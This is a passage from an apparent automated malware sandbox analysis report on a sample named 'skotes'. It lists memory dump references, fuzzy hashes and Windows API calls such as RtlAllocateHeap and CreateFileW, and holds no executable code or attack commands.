                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __wsopen_s
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3347428461-0
                                                                                                                                                                • Opcode ID: 24af0d1ea8b4968fd318e75d287ed500fb71b2cfeeb1fc74533e68941ab12b73
                                                                                                                                                                • Instruction ID: 2e0ac2f4cd58ece3ef934dc2f1273d53064f9513c50d8363cc8f41540032641b
                                                                                                                                                                • Opcode Fuzzy Hash: 24af0d1ea8b4968fd318e75d287ed500fb71b2cfeeb1fc74533e68941ab12b73
                                                                                                                                                                • Instruction Fuzzy Hash: 8D111571A0420AAFCB05DF58E9419DE7BF4EF48304F1440A9F809AB351DA70EE21CB65
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BBA813,00000001,00000364,00000006,000000FF,?,00B9D3FC,670DF653,?,00B97A8B,?), ref: 00BBD871
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                • Opcode ID: 7de0f7b09d33b1b0835e0de6f271fdc97c246d7c5bc95d0f96dc3446698e1be6
                                                                                                                                                                • Instruction ID: fd48194b4498c69c9e94a8e7e91ab8a05ba24ed48ff12b74c64c5e011fc5cff0
                                                                                                                                                                • Opcode Fuzzy Hash: 7de0f7b09d33b1b0835e0de6f271fdc97c246d7c5bc95d0f96dc3446698e1be6
                                                                                                                                                                • Instruction Fuzzy Hash: 66F0E93160112467EB212A729C01AFB37D9DF85372B1480A1ED089B181FEE8EC0086E0
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,670DF653,?,?,00B9D3FC,670DF653,?,00B97A8B,?,?,?,?,?,?,00B87465,?), ref: 00BBB07E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                • Opcode ID: 5d784b25ad899f5163a7af3cef8c703c52f3a910670af584c6b04dd303505103
                                                                                                                                                                • Instruction ID: 7b1a4608ffec1a7e00018e1125b52d67b1aeffe5cba2a27b579c3e88a301a9ec
                                                                                                                                                                • Opcode Fuzzy Hash: 5d784b25ad899f5163a7af3cef8c703c52f3a910670af584c6b04dd303505103
                                                                                                                                                                • Instruction Fuzzy Hash: 34E06D3524122697EA3132768C80FFFB7C8DB423A0F9502A1EE6996190EFE0DC0082E1
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNEL32(00000000,00000000,?,00BC1B65,?,?,00000000,?,00BC1B65,00000000,0000000C), ref: 00BC1792
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                • Opcode ID: f520bfd0c1be017ce496360f2216f61659ed049555d6fa84ac1a13e31e98006b
                                                                                                                                                                • Instruction ID: d0c9620b25540bf31c4c748b9ce7b257635cd928deb531a5389b885ec3f5a5d1
                                                                                                                                                                • Opcode Fuzzy Hash: f520bfd0c1be017ce496360f2216f61659ed049555d6fa84ac1a13e31e98006b
                                                                                                                                                                • Instruction Fuzzy Hash: 8CD0923204010DBBDF129E84DC02EDE3BAAFF88758F018110BE1C66020C732E871AB94
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3404048544.00000000049D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_49d0000_skotes.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: b09516fdd2e29a5a7c3cb81866b92b3a4bccaae36e437b4327ab69d0d6025c58
                                                                                                                                                                • Instruction ID: e183dc82b268c0629da02b41867cfea22e51025b844deae5cb21ea411f0fb5d4
                                                                                                                                                                • Opcode Fuzzy Hash: b09516fdd2e29a5a7c3cb81866b92b3a4bccaae36e437b4327ab69d0d6025c58
                                                                                                                                                                • Instruction Fuzzy Hash: 8E11B4F638D110BD614240A66B54AF66B1FE6D6738F30CD37B80BC6642F355295E7032
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3404048544.00000000049D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_49d0000_skotes.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 52ffeca2b10f4f97bc9b42a6230982552caa499753ecbef15634949bdb61e622
                                                                                                                                                                • Instruction ID: e0b2329f9c4b72eddaf30486fbeb3816362a1a4b8eaa34dd8795d096781430dd
                                                                                                                                                                • Opcode Fuzzy Hash: 52ffeca2b10f4f97bc9b42a6230982552caa499753ecbef15634949bdb61e622
                                                                                                                                                                • Instruction Fuzzy Hash: 2D11B6E634D210BDB14240666B54BF66B1FE6D6738F30CD37B84BC6A42B7942A5A7032
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3404048544.00000000049D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_49d0000_skotes.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
